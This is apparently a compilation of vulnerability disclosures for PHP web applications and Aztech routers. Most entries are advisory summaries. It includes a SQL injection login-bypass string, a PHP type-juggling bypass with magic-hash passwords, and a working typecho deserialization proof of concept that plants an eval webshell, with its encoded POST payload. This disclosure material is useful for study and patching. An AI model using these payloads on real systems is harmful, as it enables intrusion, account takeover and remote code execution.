A vulnerability, which was classified as problematic, has been found in SourceCodester Online Pizza Ordering System 1.0. This issue affects some unknown processing of the file admin/ajax.php?action=save_user. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221681 was assigned to this vulnerability.

CVE-2023-0988

A vulnerability classified as problematic was found in SourceCodester Online Pizza Ordering System 1.0. This vulnerability affects unknown code of the file index.php?page=checkout. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221680.

CVE-2023-0987

A vulnerability was found in SourceCodester Yoga Class Registration System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/registrations/update_status.php of the component Status Update Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221675.

CVE-2023-0980

Online Student Admission System in PHP Free Source Code 1.0 was discovered to contain a SQL injection vulnerability via the username parameter.

All details about CVE-2022–48149

Software: Sourcecodester’s Online Student Admission System.

Software Link: https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html

Vulnerability Type: SQL Injection

Affected Component: Admin Login form

Impact Escalation of Privileges: true

Attack Type: Remote

Vendor of Product: Sourcecodester

Description: SQL injection attack occurs when an unintended data enters a program from an untrusted source. The vulnerability exists in Sourcecodester’s Online Student Admission System in the login form. Simply by using the SQL Injection command on the username field admin’ OR 1=1 — — so without entering the credential we are able to login admin account.

Impact: This vulnerability allows an attacker to get unauthorized access to admin account.

CVE-2022-48149: CVE-2022–48149 - Ahmed Mehsania - Medium

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.

**CVE-2022-45600**

CVE URL:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45600

Reported by:

TanYeeTat

Product:

Aztech WMB250AC Wireless Mesh Routers

Affected Firmware:

2020 Release (topaz-linux.lzma.img)

Firmware download:

closed source

> Product Manual: https://kylaconnect.com/download-center/

> Vulnerability was reported to Aztech's security team via security@aztech.com on **7th June 2022**, with no response as of 21st February 2023
> 
> *   Kylaconnect Vulnerability Disclosure

**Vulnerability Details**

A Command Injection vulnerability (that leads to Privilege Escalation) exists in multiple webpages (list below), that allows a web-authenticated user to execute arbitrary shell commands on the device as the root user. The root user account could not be accessed in any other conventional methods (e.g., Telnet), and has been locked down by the firmware's configuration. This vulnerability bypasses that configuration and escalates an attacker's privileges to root.

List of affected webpages

*   Line 283 in status_wireless.php
*   Line 54 in config_wps.php
*   Line 81 in assoc_table.php
*   Line 55 in config_macfilter.php
*   Line 54 in config_wps.php

There is a lack of input validation and sanitization in the above list of web pages affecting the processing of a GET parameter,id, which is fed into a shell command that is executed as the root user. Command injection is performed by terminating the preceeding legitimate shell command with a semicolon ;, followed by an arbitrary shell command to inject.

> Snippet of retrieving the GET parameter id
> 
> *   the value of id is stored into interface_id variable

> Further down the PHP codes, the interface_id is fed into multiple exec() calls without validation or sanitization

**Proof of Concept**

The following steps will list how to reproduce this vulnerability

1.  Start the product physically or emulated
2.  Modify the PoC bash script's credentials to authenticate to the web service
3.  Execute the PoC bash script to obtain a root shell on the device

CVE-2022-45600: GitHub - ethancunt/CVE-2022-45600

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, allows attackers to gain escalated privileges only when specific conditions regarding a given accounts hashed password.

**CVE-2022-45599**

CVE URL:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45599

Reported by:

TanYeeTat

Product:

Aztech WMB250AC Wireless Mesh Routers

Affected Firmware:

2020 Release (topaz-linux.lzma.img)

Firmware download:

closed source

> Product Manual: https://kylaconnect.com/download-center/

> Vulnerability was reported to Aztech's security team via security@aztech.com on **7th June 2022**, with no response as of 21st February 2023
> 
> *   Kylaconnect Vulnerability Disclosure

**Vulnerability Details**

A PHP Type Juggling vulnerability exists in the login.php web page on port 80, in the password authentication field, that allows an attacker to authenticate without knowledge of the admin's password. This however, has a very low probability of occurance, as the admin's MD5-hashed password has start with a 0e and followed by **numbers**. A comprehensive list of plaintext passwords and their corresponding MD5 hashes that are succeptible to a PHP Type Juggling Attack is provided below, along with a reference blog that explains it in detail.

> MD5 Type Juggling List
> 
> Whitehatsec Blog Magic Hashes

**TLDR**: The PHP source code in login.php that handles the authentication checks are performed with Loose Comparison (==, two equal signs), instead of using a Strict Comparison (===, three equal signs).

**Proof Of Concept**

1.  Configure the admin user's password to be a plaintext value that when MD5-hashed results in it starting with a 0e and followed by numbers
    
    *   e.g., Plaintext: PJNPDWY, MD5: 0e291529052894702774557631701704
    
    > Note: an invalid hash of 0e123456789012345678901234567890 will work as well
    
2.  Authenticate as the admin user on the web service with username admin and any plaintext password found in MD5 Type Juggling List (e.g., 240610708)

CVE-2022-45599: GitHub - ethancunt/CVE-2022-45599

typecho 1.1/17.10.30 was discovered to contain a remote code execution (RCE) vulnerability via install.php.

**List of Vulnerable path**

Vulnerable path /install.php  
Lines 60-69 of the "install.php" catch the error but do nothing,so bypass the line 65's "exit".  
  
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.  
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)  
  
  
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "http://localhost/".  
  
Line 291 of the "install.php" has a function "unserialize",it can be exploited maliciously.  
The parameters come from line 83 of the "/var/Typecho/Cookie.php".  
  
Line 420 of the "install.php" triggeres function "\_\_toString".  
Line 223 of the "/var/Typecho/Feed.php" has function "\_\_toString"  
  
  
  
Line 290 of the "/var/Typecho/Feed.php" triggeres function "\_\_get".  
Line 270 of the "/var/Typecho/Request.php" has function "\_\_get"  
  
  
  
We can exploit function "call\_user\_func" to Remote Code Execute.

**Vulnerability exploitation process:**

It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.  
  
The "ok" will be sent if it is success because of the POC.Then test the webshell.  

**POC code:**

<?php
class Typecho\_Request{
    private $\_params\= array('screenName'\=> 'php -r "echo \\'ok\\';file\_put\_contents(\\'cmd.php\\', \\'<?php eval($\_POST\[\\"youyou\\"\]); ?>\\');"');
    private $\_filter\= array('system');
}
class Typecho\_Feed{
    private $\_items\=array();
    private $\_type\='ATOM 1.0';
    public function \_\_construct()
    {
        $items\['author'\]=new Typecho\_Request();
        $this\->\_items\[0\]=$items;
    }
}
$config\['prefix'\] = new Typecho\_Feed();;
$payload = base64\_encode(serialize($config));
echo $payload;

URL: http://localhost/install.php?start=1
POST Data: delete=true&\_\_typecho\_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0\=
Reffer: http://localhost/

CVE-2023-24114: the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability · Issue #1523 · typecho/typecho

A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server.

CVE-2023-22974: OpenEMR Patches - OpenEMR Project Wiki

pfSense CE through 2.6.0 and pfSense Plus before 22.05 allow XSS in the WebGUI via URL Table Alias URL parameters.

closed

 

**Potential XSS from URL and URL Table alias URLs**

Category:

Aliases / Tables

Plus Target Version:

22.05

**Description**

The URL from a URL or URL Table type alias is not sanitized before display on firewall_alias.php, which can potentially lead to a stored XSS when viewing the list of aliases on the **URL** or **All** tabs.

The URL from a URL table alias is also not sanitized when included in the alias popup on various firewall and NAT rule pages, but that mechanism has its own safety measures which prevent it from being a concern there. Even so, it's best to encode it in the popup.

*   History
*   Notes
*   Property changes
*   Associated revisions

*   **Status** changed from _New_ to _Feedback_
*   **% Done** changed from _0_ to _100_

*   **Status** changed from _Feedback_ to _Resolved_

No issues on current snapshots

*   **Private** changed from _Yes_ to _No_

Also available in: Atom PDF

CVE-2022-29273: Bug #13060: Potential XSS from URL and URL Table alias URLs - pfSense

A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. Affected is an unknown function of the file admin/products/view_product.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. VDB-221634 is the identifier assigned to this vulnerability.

Tag

#php